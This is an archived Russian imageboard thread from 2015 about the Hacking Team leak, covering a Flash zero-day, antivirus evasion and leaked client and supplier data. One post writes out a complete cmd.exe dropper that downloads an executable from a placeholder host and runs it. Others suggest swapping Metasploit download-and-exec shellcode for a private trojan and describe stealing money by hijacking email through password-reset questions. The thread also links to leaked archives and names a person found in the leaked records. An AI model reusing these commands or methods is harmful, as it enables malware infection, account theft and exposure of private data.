24 декабря Архивач восстановлен после серьёзной аварии. К сожалению, значительная часть сохранённых изображений и видео была потеряна. Подробности случившегося. Мы призываем всех неравнодушных помочь нам с восстановлением утраченного контента!
Скайп-конфа с мини-защитой от совсем уж гуманитариев: '?chat&blob=MgPuhmDhU5ZZklIlsI6BSXWePrV4i1SFcRKniEy_fWuzjgskfsXYCiga64-rORFWFQ9Q04tQC_Z3wB5h_18I7TK04Q' 's/XY/BJ/g' (позже адекваты перекатятся в tox, это предбанник)
Последние находки: >$ mdb-export Fornitori_2014.mdb "t_Fornitori" | grep -i -e russia -e ^ID >ID,Codice Fornitore,Società,Partita IVA,Cognome,Nome,Indirizzo,Città,Provincia,CAP,Paese,Telefono (Uff),Telefono Cellulare,Fax,Indirizzo E-Mail,Modalità di Pagamento,Pagina Web,Note,Fido Fornitore,Allegato >... >1732,"999126","VITALIY TOROPOV",,,,,,,,"RUSSIA",,,,,,,,,5554
>Гугл по запросу VITALIY TOROPOV выдает >>Vitaliy Toropov has contributed to the Exploit Database with remote exploits, local vulnerabilities, web applications and papers.
>Получается, они у него приватные эксплоиты покупали напрямую, раз он есть в табличке получателей денег. > Тянет на гос. измену? Лулзы будем извлекать?
Зеленый — антивирус никак не реагирует на запуск агента. Желтый — агент устанавливает соединение с сервером, но иногда могут появляться предупреждения антивируса, или же антивирус имеет нестандартную конфигурацию (т.е. фаервол отключен). Черный — агент не может установить соединение с сервером, но нет и предупреждений антивируса, или же агент находится в черном списке антивируса. Красный — агент не может установить соединение с сервером, появляются предупреждения антивируса (агент детектируется как вредоносный).
Solider — стандартная версия агента. Elite — продвинутая версия.
>>96968367 вот смотришь ты видео, флеш используешь. но на самом деле флеш использует тебя. в слитых сурцах есть модули для кражи паролей, переписки, данных, криптовалюты и бг знает сего. попадешься на такой флешскрипт на говносайте или в баннерной рекламе и считай тебя выебли в жопу.
Я так понял гуманитарию делать нечего? Я толком треды не читал. Только в первом треде сидел немного. Что удалось узнать? Компроматы или что? пароли? Что из себя представляет папка весом в 400гб? Простите гуманитария если что.
Почему эта новость есть только на поп-сайтах для желающих, так сказать, приобщиться, но нету на том же opennet/membrana/endgadget? Что, только на хабре сидят тру-спецы? Почему молчат сообщества всяких вумных дядек с большими головами?
Блядь, товарищи ебанаты, если вы думаете, что там есть кнопка "Бабло" — вы пиздец как ошиблись тредом. Я просто занимаюсь научными изысканиями, мне интересно, что происходит в глубинах такой крупной хак-компании. Я не пытаюсь извлечь какой-то профит, или запустить калькулятор. Я просто поглощаю информацию и делаю выводы. Если кто-то хочет профита - пиздуйте в /biz/.
>>96969114 >Укажи путь к нему пожалуйста. /git/core-win32/HM_Money.h >Есть идеи как его можно запустить на компьютере у жертвы? с помощью нулдей флеш сплоита?
Я правильно всё понял про 0дау флеш. Ты пишешь скрипт который предположим пиздит все твои кукисы с ПК. Кидаешь ссылку на видосик, почан нажимает и твой скрипт используя флеш кочает всё что нужно. При этом антивирус спит спокойно, ведь работает просто флеш. Так?
>>96969506 Всё это работает в контексте доверенного процесса браузера и флеша (контейнера от браузера, но не суть). А вот даже когда что-то будет запущено в контексте браузера, у нормальних HIPS оно не сработает, т.к. не имеет доверенного ЭЦП и не проходит по вайт листам.
Однако у 99,9% населения HIPS настроены на блек листы, а не на вайт, так что у них молча отрабоает.
Ребят, а что в более глобальном смысле? Я имею ввиду государства, спецслужбы и прочее? Ясен хуй, что переворотов не будет, ведь даже после Сноудена всё спустили на тормозах, но должна же быть какая-то реакция масс? Я не прав?
>>96969566 > Но ведь скрипт в песочнице флеша Нет. calc.exe из примера - это стандартный calc.exe, его даже в процессах видно, можно диспетчером задач убить. Соответственно, на него распространяется всё то, что распространяется на любую другую программу. Никакой "песочницы флеша" не существует.
>>96969964 Потому что это недокументированный способ запустить экзешник. В теории, если юзер уровня "тупая домохозяйка со ZverCD", то можно что-нибудь у неё спиздить. А так-то вообще флеш может запускать экзешники вполне легально и без всяких эксплойтов.
>>96969840 Ну есть же эти ебучие журналисты, которые очень охочи за сенсациями, что им стоит найти понимающего в этом человека, заплатить ему денег, чтобы он на пальцах, поверхностно растолковал что к чему, а потом, с его слов, запилить что-то типа:"Вас ебут в жопу через VK, ля-ля-ля прямотупые аргументы для обывателя, по данным нашего консультанта-специалиста"?
Хотя... Да бред конечно, всем же похуй похоже, вы правы.
>>96970437 Йоп твой мать, возьми шеллкодес с метасплоента download&exec, пропиши туда урл своего превейтного троя да подсунь вместо дефолтного шеллкодеса.
>>96970755 Хуйню морозишь, если честно. Флеш у хипса в доверенных, например. Срабатывает сплоент и шеллкодес выполняется в контексте флеша, не в отдельном, а просто из подпрограммы флеш вышел заместо стандарта в другом месте, а там кодес. Даже качать сможет из инета все, что хочешь, если в хипсе нет запрета флешу в инет лазить. А вот с сохранением на диск хипс может поднасрать. А может и нет.
Как же хуево ощущать что я быдло. Есть же такие хакеры, и это только верхушечка айсберга в паблик утекла. Есть десятки эксплойтов, которые используются прямо сейчас бесплатно без смс. КАК ИХ СОЗДАЮТ БЛЯТЬ??? Я у мамы погромист веб-макака, и я нахуй не представляю, как они вообще находят эти дыры. Вот же гении, правда. А уж особенно круты разрабы ботнетов, которые просто ПО ДЕФОЛТУ проходят половину антивирусов. Это такой астрал что охуеть
>>96970971 Я вот быдло, ничего не шарю, просто ищу в гугле подходящую почту и ломаю через вопрос-ответ. Украл 20к баксов, если бы не ебланил было бы 40. Сейачс пытаюсь понять как этим 0day пользоваться, чувствую себя своим батей который сидит в одноклассниках.
>>96971216 Да, через форму возврата пароля, часто это родной город, или реально фамилия матери, или же просто Ctrl+C Ctrl+V. >>96971234 Почта с определенного круга лиц.
>>96967985 Мне на днях компукторщик советовал снести аваст и установить какой-то там Интернет 180 антивирус ВИП бесплатно Пошел нахуй, компуторщик со своим интернет 180 антивирус ВИП бесплатно
Я правильно понимаю, что это тред толстяков, которые вставляют в предложения несуществующие слова, а в конце приписывают "Умные люди уже льют траф и рубят кучу бабала"? Если это так, то годно вышло, вон сколько почт в тред скинули.
>>96971348 ну вот давай представить что вместо CALC.EXE запускается CMD.EXЕ. Тогда достаточно изменить аргументы примерное на такие: cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs &@echo objXMLHTTP.open "GET","http://www.SOOOQAEBLANTUPOI.net/VIRUSBOTNETTROJANWORMEXPLOIT300000.exe",false>>poc.vbs&@echo objXMLHTTP.send()>>poc.vbs&@echo If objXMLH TTP.Status=200 Then>>poc.vbs&@echo Set objADOStream=CreateObject("ADODB .Stream")>>poc.vbs&@echo objADOStream.Open>>poc.vbs&@echo objADOStream. Type=1 >>poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc. vbs&@echo objADOStream.Position=0 >>poc.vbs&@echo objADOStream.SaveToFi le "mess.exe">>poc.vbs&@echo objADOStream.Close>>poc.vbs&@echo Set objA DOStream=Nothing>>poc.vbs&@echo End if>>poc.vbs&@echo Set objXMLHTTP=No thing>>poc.vbs&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vb s&@echo objShell.Exec("mess.exe")>>poc.vbs&cscript.exe poc.vbs"
>>96970935 Ни откуда. Нет понятия "вредоносная". Можно попытаться сделать нечто, что не вызовет подозрений HIPS. Для дефолтных настроек популярных систем защиты для домохозяек это достаточно широкий набор возможностей.
>>96970941 Зачем ты подтверждаешь мои слова. Я уже сказал, что браузер и флеш будут доверенные. В примере с калком он также будет доверен понятно почему. А вот левая программа уже доверенной не будет. Открытым остаётся вопрос,права на что именно даны процессу браузера в системе каждого конкретного юзера каждым конкретным производителем средств защиты.
Это если говорить о конкретно зеродее. Если говорить о самом событии, то оно более глобальное, чем атака на комп МарИванны.
>>96973148 >В примере с калком он также будет доверен понятно почему. А вот левая программа уже доверенной не будет А зачем программа? В шеллкодесе пусть вся нагрузка будет. А он только в памяти.
>>96972893 >за ее обход гугл платит больше всего денег Это про какую-то группировку, которая ищет уязвимости у крупных фирм, а потом деньги с них трясет?
>>96973076 Непонятно, зачем ты мешаешь разные этапы возможно даже разных задач вместе. > Ну и как НЕЧТО сделает НЕЧТО, что в исходных условиях задачи не спрашивалось? Вот как-то так.
Хакер в треде. Можете задавать свои вопросы. Нет, защитить себя никак нельзя, только отрубить инет от своего компа и капчевать с разных интернет-клубов.
>>96973229 Пусть, кто же против? У нас же нет конкретной цели. У нас есть инструмент, которым можно выполнить нечто в системе жертвы и старт нам даст браузер. Если конкретная цель - сделать дамп жёсткого диска и спереть его, понятное дело, что браузером это не сделаешь.
Бляд, вы чо, флэш, джава и сильверлайт, самая дыраявая хуерга которая есть на сегодняшний день. Уже лет 5 все адекваты её отключают или делают на клик по запросу. Каким ебланом надо быть? А что, кроме зеродэй флеша они ничего не нахакерили? Пиздец, за что им деньги то платили.
>>96973768 >Пиздец, за что им деньги то платили. За что можно платить деньги организации, которая хранила эмейлы/пароли/данные в незакриптованных тхт файлах?
>>96973956 Вот и я о том же. Жиденько обосрались итальянцы. Алсо, почитал на вайсе и реддите, что они (итальянцы) отправляли своим же клиентам бакдор к их компьютерам, без ведома самих же клиентов, лол. В общем, надеюсь итальянцы выйдут из бизнеса, и никто их услугами пользоваться не будет, чего они и заслуживают. Жаль, что анон такой поверхностный и его интересуют только пароли от вк ЕОТ, так бы можно было нарыть инфу о цп, наркотиках, заказных атаках и прочем.
>>96967400 Аноны, поясните тупому гуманитарию, что за хуйня происходит, и кому и чем она теперь грозит? Я так понимаю, развернулось очень серьёзное дерьмо.
Так что этот архив не содержит самых свежих вкусностей один хуй, можно выжимать что-то, но самый свежак в паблик так и не утёк. Так что может быть это всё вообще хуйня и самопиар.
>>96974345 ОП (и те, кто в конфе), а вы не думали что скачав этот торент файл вы сами стали частью ботнета? Я, конечно, тупой гуманитарий и это только мои мысли.
>>96970076 У меня в Хроме начал пиздецки лагать флеш плеер, мне пиздата? Мой аккаунт стима угонят нахуй? Как обычному белому человеку избежать этой ебалы?
>>96971569 А свой код запустить можно? Смысл в запуске обычных приложений юзера? Я вот тоже могу написать прогу которая будет запускать калькулятор на Android/iOS, а толку-то, само приложение все-равно в своей песочнице.
Что-то мне подсказывает что ITT просто все лузлы ловят с vk-школьников.
>>96974202 Нихуя серьезного. Протелка пораша и мамкины кулхацкеры на каникулах с пеной у рта бороздят 400гб отменного ничего в поисках HackTheWorld.exe
>>96975235 Во-первых работала, во-вторых это ты даун, если считаешь, что работать с корпорацией, 400гб данных которой утекли в сеть, чем-то престижным.
>>96971688 >комодо и аваста и парочки нонеймов Совпадение, не думаю. Просто на них хуй забили (тк они занимают 0.00005% рынка). Если потребуется, то и для них код-обхода добавят.
>>96972021 Калькулятор запускается только для примера, чтобы показать что это работает, на деле хацкеры будут вызвать что-то другое. Там анон, который привел код для примера, имеет ввиду, что будет вызвана командная строка, из неё создан скрипт в виде файла *.vbs на пека жертвы, потом будет запущен этот скрипт, далее скрипт загрузит троян, сохранит на пека жертвы и запустит его. Как-то так.
>>96976849 мелкомягкие обосрались уже за эти 2 дня несколько раз ,ибо их выебали во всех их продуктах.. Дыры в скайпе залатают быстро ,если они не дегенераты.. хотя о чем я говорю ,управляет то ими индус..
>>96976358 Это серьезно? они так у себя хранили пассы в текстовом документе/ворде? Пиздец, я на свей работе госпомойке и то лучше отношусь к безопасности.
>>96977308 Ну как бы тут и скандалы и интриги с расследованиями.
1. одей флеш сплойт. 2. клиенты которые пользуются услугами вирусописателей. В листинге я видел банки. 3. ремоте сплойт для виндовс ..етц 4. билд их троянца, незнаю есть ли там исходники.
вроде вот этого всего уже достаточно. для хакиров интересны сорцы и мануалы, для журналистов клиенты
Эй, хакеры, как достать пароли из хрома и лисы? Предположим я уже получил доступ к компьютеру жертвы. Что дальше? Банпану тред приватными фоточками одной пизды, если получится все.
>>96975858 Не понимаю, что смешного. Или уже нельзя брать куски кода со стековерфлоу, чтобы не писать их самим? Тут же суть не в том, что ты не можешь написать, а в простой экономии времени.
>>96978143 Именно так > Компания Apple выпустила OS X 10.10.4, закрыв 77 security-уязвимостей в рамках обновления APPLE-SA-2015-06-30-2 (OS X Yosemite v10.10.4 and Security Update 2015-005). Как обычно, большинство закрытых уязвимостей позволяют атакующим исполнять произвольный код в OS X, в т. ч. с системными привилегиями.
>>96978590 А там что-то вредное было? Я же новость только публиковал, и то репост репоста. Я и сам-то ничего не скачал, лол, как я могу распространять?
>>96978837 попизди мне еще. Флеш работает всегда из коробки ровно,во всех бровзерах,в отличае от хтмл5 который на всем кроме хрома крашится с рандомным шансом. флешдевелопер вернулся
>>96978837 попизди мне еще. Флеш работает всегда из коробки ровно,во всех бровзерах,в отличае от хтмл5 который на всем кроме хрома крашится с рандомным шансом. флешдевелопер вернулся
>>96979518 ой бля,перейду на жабу там синтаксис такой же епта. Алсо,вы с прошлого треда сколько кукарекали но так и не предложили реально альтернативы флешу.
>>96979667 >>кукарекает что флеш говно >>в качестве альтернативы предлагает еще больше говно с функционалом 2004года и отсуствием нормальной поддержки. ЯСНА) флешдевелопер
>>96979843 Слили файл сервер, там различные версии и прочее говно в виде файлов пользователей. Различные данные по клиентам, дистрибутивов только гб на 150.
(прошлый тред: )
Архивы тредов:
1 тред: http://arhivach.org/thread/94173/
2 тред: http://arhivach.org/thread/94210/
3 тред: http://arhivach.org/thread/94315/
Пруфы рабочего 0day во Flash Player из дампа:
https://twitter.com/w3bd3vil/status/618168863708962816
https://twitter.com/markloman/status/618341156125048832
В новостях:
http://habrahabr.ru/company/eset/blog/261887/ (В апдейтах вин — подтвержден 0day эксплоит)
https://meduza.io/shapito/2015/07/06/sozdateli-instrumentov-dlya-slezhki-za-polzovatelyami-ispolzovali-idiotskie-paroli
http://lenta.ru/news/2015/07/06/team/
http://www.computerra.ru/127725/hacking-team-was-hacked/
Torrent-файлы (не используйте uTorrent, он не умеет в такой большой torrent-файл, юзайте Transmission, Tixati):
https://mega.co.nz/#!Xx1lhChT!rbB-LQQyRypxd5bcQnqu-IMZN20ygW_lWfdHdqpKH3E
https://infotomb.com/eyyxo.torrent
Скайп-конфа с мини-защитой от совсем уж гуманитариев:
'?chat&blob=MgPuhmDhU5ZZklIlsI6BSXWePrV4i1SFcRKniEy_fWuzjgskfsXYCiga64-rORFWFQ9Q04tQC_Z3wB5h_18I7TK04Q' 's/XY/BJ/g' (позже адекваты перекатятся в tox, это предбанник)
Зеркало исходников в git выпилили, сорцы без ./.git-директорий:
https://mega.nz/#!nkBU1RwI!eBLsg-9ODgQDpGseQ_EdR0nmnVQzm9RK6jNinX-mgvU
Некоторые папки от частично скачавшего торрент анона:
https://mega.co.nz/#F!fJ5WjJLZ!sUj6M7KtBncc-LpOvP8sfg
Последние находки:
>$ mdb-export Fornitori_2014.mdb "t_Fornitori" | grep -i -e russia -e ^ID
>ID,Codice Fornitore,Società,Partita IVA,Cognome,Nome,Indirizzo,Città,Provincia,CAP,Paese,Telefono (Uff),Telefono Cellulare,Fax,Indirizzo E-Mail,Modalità di Pagamento,Pagina Web,Note,Fido Fornitore,Allegato
>...
>1732,"999126","VITALIY TOROPOV",,,,,,,,"RUSSIA",,,,,,,,,5554
>Гугл по запросу VITALIY TOROPOV выдает
>>Vitaliy Toropov has contributed to the Exploit Database with remote exploits, local vulnerabilities, web applications and papers.
>Получается, они у него приватные эксплоиты покупали напрямую, раз он есть в табличке получателей денег.
> Тянет на гос. измену? Лулзы будем извлекать?